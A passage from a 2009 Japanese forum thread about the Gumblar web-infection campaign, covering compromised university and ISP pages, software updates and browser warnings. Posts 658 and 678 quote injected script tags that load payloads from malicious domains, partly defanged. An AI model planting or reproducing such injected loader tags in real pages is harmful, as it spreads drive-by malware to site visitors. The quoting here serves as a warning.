652 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:29:50 ] レジストリをいじるプログラムなんかをその感染後にバックアップした中から また入れなおすときには要注意ってことかなるほど
653 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:36:33 ] レジストリいじるのって、簡単に言うなら例えばexe系プログラム等だもんな。 画像ファイルやテキストワードファイルや音楽ファイルなんかは それ自体はレジストリいじるのはあまりないだろうし、 それらを動かす為のプログラムは新しくダウンしてインスコなりすれば問題なさそうだな。 詳しい人には散々既出かもしれないが、大分色々わかってきてとても有難い。
654 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:48:59 ] ほんとにわかってるのかすごく心配になる文章だな つーか何を言いたいのか1回読んだだけじゃまったく理解できん とりあえず1行目のは実行ファイルっていえばいいんじゃね
655 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:58:58 ] 実行ファイルじゃなくてレジストリに設定を保存するソフトウェアのようなことを言ってるのかな やっと解読できた Genoの場合もそうだけどウイルスはドライバとしてロードされる部分に 埋め込まれることが多いからちょっと違う場所なんだけどね まあレジストリは下手にいじると本当に危ないんで注意してください
656 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 10:00:18 ] //404の中身が変わって、有害化してるらしい。 中にはLocationヘッドで違うページに転送してそこに難読化したスクリプトが置いてあるのもある。
657 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 14:13:21 ] >>656 のとおり、 一時期無害化されていたGumblar.xが攻撃再開。ご注意を。
658 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 08:54:42 ] こんなの貼られてた Hは半角小文字、前後のスペースなし ●は.で </head> <script src= H ttp://christinateatern●se/images/kartachristina●jpg-for-web-small●php ></script><body>
659 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 16:41:42 ] Google Chormeでのweb巡回でもGENO対策になりますか・・・ 横レススマソ
660 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:12:22 ] いいえ どこが横レスなのかわからん Google Safe Brwosingで既知の危険サイトはブロックするかもしれないけど 新型感染サイトはブロックされない可能性がある まずは各種ソフトウェアの更新をしっかりやってください
661 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:25:48 ] ソフトウェアの更新については>>359 あたり参照 今のところ直接関係はないけどJavaランタイムはVersion 6 Update 17が最新
662 名前:名無しさん@お腹いっぱい。 [2009/11/08(日) 13:15:38 ] Javaランタイムのバージョン確認方法は
663 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 14:00:58 ] >>662 サイトくらい見ればいいのに www.java.com/ja/download/installed.jsp あと設定→コントロールパネル→Java→ 基本タブにあるバージョン情報ボタンクリック
664 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 21:01:02 ] バージョンすら確認出来ないのにネットやってて大丈夫なのかよw
665 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 18:28:40 ] あったりまえじゃん! ぜーんぜんへーきさ
666 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 19:30:54 ] 立命館大学の学園祭HPが感染したってマジか?
667 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 20:56:59 ] >>666 貴方↓の中の人ですか? ttp://www3.atword.jp/gnome/2009/11/08/warning-ritsumeikan-univ-festival-site-compromized-by-gumblar/ Gumblar.xですか。 ソースチェカー ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.rits-fes-by-e2.net%2F&hua= Googleから行くと弾かれますね。 立命館大学衣笠学園祭事務局 問い合わせ ttp://www.rits-fes.net/mail/index.html TEL/FAX:075-465-7891 ↑ 電話で教えて差し上げましたが対応が最悪です。 挙句の果てに電話を切られました。もうね、アホかとw
668 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:06:39 ] うほwwwwwがっつり感染しとるwww
669 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:12:18 ] >>667 今行くと404が出るからやっと対応したのかな? でも今日の時点でアクセスカウンターが3万行ってたんだから きちんと経緯とかを説明して欲しいね
670 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:39:18 ] 中の人ならいまさらマジかっていわないだろwww
671 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:51:07 ] 【セキュリティ】マルウェア「Gumblar」のホーム・ドメインが復活 (09/11/09) pc11.2ch.net/test/read.cgi/pcnews/1257767416/
672 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 23:21:36 ] >>671 難しくてわからない 3行にまとめて下さい
673 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 18:53:13 ] ttp://www.google.co.jp/search?hl=ja&rlz=1R2ADBR_ja&q=%E7%AB%8B%E5%91%BD%E9%A4%A8%E5%A4%A7%E5%AD%A6BKC%E5%AD%A6%E5%9C%92%E7%A5%AD%E4%BA%8B%E5%8B%99%E5%B1%80+077-561-3990&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq= 立命館大学BKC学園祭事務局 TEL:077-561-3990 ↑ に電話をしたところ、話の途中でFAX回線に切り替えられましたw ピーピロピロピーってorz [PDF] 立命館大学に於ける 情報セキュリティ対策の現状と課題 ttp://www.nii.ac.jp/csi/upki/secsem/2009/Secsem2009/seminar_04.pdf カタカナ英語使えばいいってもんじゃないっしょww
674 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 20:14:45 ] 関西の大学に常識的な対応を期待するなよ
675 名前:名無しさん@お腹いっぱい。 [2009/11/13(金) 16:15:20 ] majormess.nlってのもGENOの亜種ですか? またクロームで警告あったんですが・・
676 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:32:49 ] 今回のGumblarは感染した別サイトにウイルス置いてばらまかせる仕様だし、被害者兼加害者かも?
677 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:52:16 ] そこからさらに亜種も派生してさらに蔓延すると 今回はLoveLetter以来のかなり悪質なものだね
678 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 15:17:39 ] 巻き込み規制喰らってるので携帯からorz http://www●interq●or●jp/ Redirectにコードが仕込んであるっぽい -- <meta http-equiv="refresh" CONTENT="0;URL=http://members●interq●or●jp/"> </head> <script src=http://ykcv●org/upload_data/blogslideconf/hvkh●php ></script><body> -- http://ykcv●org/upload_data/blogslideconf/hvkh●php ↓ http://forgottenchild●in/fieldtrips/shareyourlove●php 業種的にやばすぎるというか 終わってるだろ・・・
679 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 16:56:08 ] >>678 今ソース見てきたけど、直ってね?
680 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 17:38:53 ] >>678 Gumblar再来襲。interQのホームページスペース「404エラー」改ざん ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html 404も改ざんされてたらしいけど、今はどうなんだろ?
681 名前:679 [2009/11/14(土) 18:33:50 ] ありゃ、>>678 のソースが復活してら。駄目だねこりゃ。
682 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 18:44:30 ] Welcome to Oriental Tunes Dear Visitor You have requested a page or file that does not exist on the site you came from. You can proceed to Oriental Tunes and look for that file on our site.
683 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 00:08:40 ] ISPのシス管感染ワロス 自社オプションサービスのウィルスチェックしてみればいいのにね
684 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:01:02 ] さすがは悪名高いinterQ・・・
685 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:24:28 ] 修正→改竄→再修正→再改竄→再々修正→再々改竄→再々再修正・・・ 無限ループすんなよwww interQ\(^o^)/オワタ
686 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 03:07:43 ] 無限ループしてる=シス管がGumblarの対処法を知らない いくら何でも致命的すぎないか……?
687 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 06:59:43 ] セーフ ブラウジング interq.or.jp の診断ページ www.google.com/safebrowsing/diagnostic?site=http://interq.or.jp&hl=ja 不正なソフトウェアは uco-squad●com/, jgreenjewelers●net/, velassin●com/ を含む 3 個のドメインでホストされています。 AS7506 (INTERQ). www.google.com/safebrowsing/diagnostic?site=AS:7506&hl=ja ※コメントは省略す(苦笑
688 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 08:11:16 ] interqなんてDQNしか使わないよ よって影響なし